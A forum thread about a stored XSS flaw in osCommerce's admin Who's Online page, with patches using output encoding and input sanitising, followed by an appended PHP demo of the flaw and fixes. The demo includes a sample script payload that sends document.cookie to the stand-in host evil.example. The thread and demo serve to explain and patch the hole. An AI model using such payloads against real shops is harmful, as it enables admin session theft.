

Security risk reported by gambio.de may also appear in OSC 2.x


Some days ago gambio.de reported a security hole in their shop software which also occurs in xt:commerce and other osCommerce-based shop systems.

As I found out, the security hole may also appear in some versions of osCommerce. Here's a patch for those who want to be safe (besides that, I strongly recommend securing the admin area with .htaccess!).


In /catalog/admin/whos_online.php just after:

while ($whos_online = tep_db_fetch_array($whos_online_query)) {


add the following line of code:

   $whos_online['last_page_url'] = htmlentities($whos_online['last_page_url']);


Could one of the developers please check and confirm?


All credits go to gambio.de, great job guys!





The first v2.3.3.1 osCommerce release fix prevents the hack. Gambio's fix is very similar.



Parse REQUEST_URI with tep_db_prepare_input() before storing the value in the database. Replace REMOTE_ADDR with tep_get_ip_address().

osCommerce-based shop owner with minimal design and focused on background works. When less is more.
Email management with tracking pixel, package management for shipping, stock management, warehouse management with bar code reader, parcel shop management on 3000 pickup points without a local store.

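Added example, not code from either poster, from gambio.de or from osCommerce itself: a stand-alone PHP script that shows the stored-XSS pattern both posts are fixing. The storefront saves the visitor's REQUEST_URI into the whos_online table, and the admin page later prints that value straight into HTML, so an attacker only has to request a crafted URL and wait for an admin to open Who's Online. The script contrasts the raw rendering with the two mitigations in this thread: encoding on output (the htmlentities() line from the first post) and sanitising before storage (the tep_db_prepare_input() approach from the second post). The sample rows, the function names and the sanitise_for_storage() stand-in for tep_db_prepare_input() are assumptions made for illustration; they are not the real osCommerce functions.

```php
<?php
// Added example (not from the original thread, gambio.de or osCommerce).
// Shows why whos_online.php was exploitable and how the two proposed fixes
// (encode on output, sanitise on input) change what reaches the admin browser.
// Names below are illustrative assumptions, not osCommerce's own functions.

// Constructed sample rows: what two storefront requests would leave behind in
// the whos_online table. REQUEST_URI is entirely attacker-controlled.
$constructed_rows = [
    ['full_name' => 'Guest', 'last_page_url' => '/index.php?cPath=22'],
    ['full_name' => 'Guest', 'last_page_url' =>
        '/index.php?x=<script>document.location="http://evil.example/?c="+document.cookie</script>'],
];

// Mirrors the admin page before the fix: raw interpolation of a stored value.
function render_unsafe(array $row): string
{
    return '<td>' . $row['last_page_url'] . '</td>';
}

// First post's fix: encode on output. ENT_QUOTES is added here so the value is
// also safe inside a single-quoted attribute; the post's one-liner relies on
// PHP's default flags, which is enough for a plain text cell.
function render_encoded(array $row): string
{
    return '<td>' . htmlentities($row['last_page_url'], ENT_QUOTES, 'UTF-8') . '</td>';
}

// Second post's fix: sanitise before storing. This is an assumed stand-in for
// tep_db_prepare_input(): angle brackets are replaced, so no tag can be stored.
// Output encoding is still applied afterwards; the two fixes are complementary.
function sanitise_for_storage(string $request_uri): string
{
    return trim(preg_replace('/[<>]/', '_', $request_uri));
}

// Cheap regression check: does the rendered cell still contain a raw tag
// other than the <td> wrapper the renderer itself adds?
function contains_raw_tag(string $html_cell): bool
{
    $inner = preg_replace('#^<td>|</td>$#', '', $html_cell);
    return (bool) preg_match('/<[a-z!\/]/i', $inner);
}

foreach ($constructed_rows as $row) {
    $stored = $row;
    $stored['last_page_url'] = sanitise_for_storage($row['last_page_url']);

    echo "unsafe          : ", render_unsafe($row), "\n";
    echo "encoded         : ", render_encoded($row), "\n";
    echo "sanitised+enc.  : ", render_encoded($stored), "\n";
    echo "raw tag (unsafe) : ", contains_raw_tag(render_unsafe($row)) ? 'yes' : 'no', "\n";
    echo "raw tag (encoded): ", contains_raw_tag(render_encoded($row)) ? 'yes' : 'no', "\n\n";
}
```

Run it with `php whos_online_demo.php`. The second row renders an executable script tag only in the unsafe branch; after either fix it appears as inert text. The check is deliberately crude (it only looks for a leading `<`), which is why output encoding, not a regex, is the actual control: it makes the browser treat the stored value as data regardless of what the attacker put in the URL.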